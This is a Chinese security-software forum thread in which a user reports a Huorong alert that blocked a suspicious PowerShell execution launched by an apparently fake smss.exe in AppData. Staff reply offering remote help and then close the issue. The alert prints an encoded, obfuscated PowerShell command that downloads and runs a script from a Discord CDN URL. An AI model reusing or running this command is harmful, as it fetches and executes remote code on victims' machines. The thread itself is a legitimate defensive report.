火绒安全软件

动态防御问题反馈
发新帖
打印 上一主题 下一主题

利用PowerShell执行可疑脚本

[复制链接]
4686 5
楼主
发表于 2021-9-18 11:13:50 | 只看该作者 |倒序浏览 |阅读模式
跳转到指定楼层
防护项目:利用PowerShell执行可疑脚本
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB2ADEAPQAiAE4AZQB0AC4AIgA7ACQAdgAyAD0AIgBXAGUAYgBDAGwAaQBlAG4AdAAiADsAaQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHYAMQAkAHYAMgApAC4AIgBEAG8AdwBuAGAAbABgAG8AYQBkAFMAdAByAGkAbgBnACIAKAAiAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADgAOAAwADIANgA1ADcAOQA2ADcANgA3ADYAMAA4ADgAOQAyAC8AOAA4ADYANAAwADEAMAAxADgAMwAxADEANgAyADYANwA4ADIALwBOAGUAdwBfAFQAZQB4AHQAXwBEAG8AYwB1AG0AZQBuAHQALgB0AHgAdAAiACkA
操作结果:已阻止

进程ID:11668
操作进程:C:\Users\Zhang\AppData\Local\smss.exe
操作进程命令行:"C:\Users\Zhang\AppData\Local\smss.exe"
父进程ID:7432
父进程:C:\Windows\Explorer.EXE
父进程命令行:C:\Windows\Explorer.EXE

回复

使用道具 举报

4686 5
沙发
发表于 2021-9-18 11:19:05 | 只看该作者
您好,方便添加QQ284816209 我们远程看下吗?
回复

使用道具 举报

4686 5
板凳
发表于 2021-9-18 11:34:06 | 只看该作者
火绒运营专员 发表于 2021-9-18 11:19
您好,方便添加QQ284816209 我们远程看下吗?

加了,同意下
回复

使用道具 举报

4686 5
地板
发表于 2021-9-18 11:41:53 | 只看该作者

好的,我们尽快处理
回复

使用道具 举报

4686 5
5#
发表于 2021-9-22 16:43:42 | 只看该作者
楼主您好,QQ一直没有收到您的回复,不知道您的问题解决了吗?
回复

使用道具 举报

4686 5
6#
发表于 2021-9-22 16:44:27 | 只看该作者
您好,您的问题已经解决,感谢您的反馈~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | [立即注册]

本版积分规则

快速回复 返回顶部 返回列表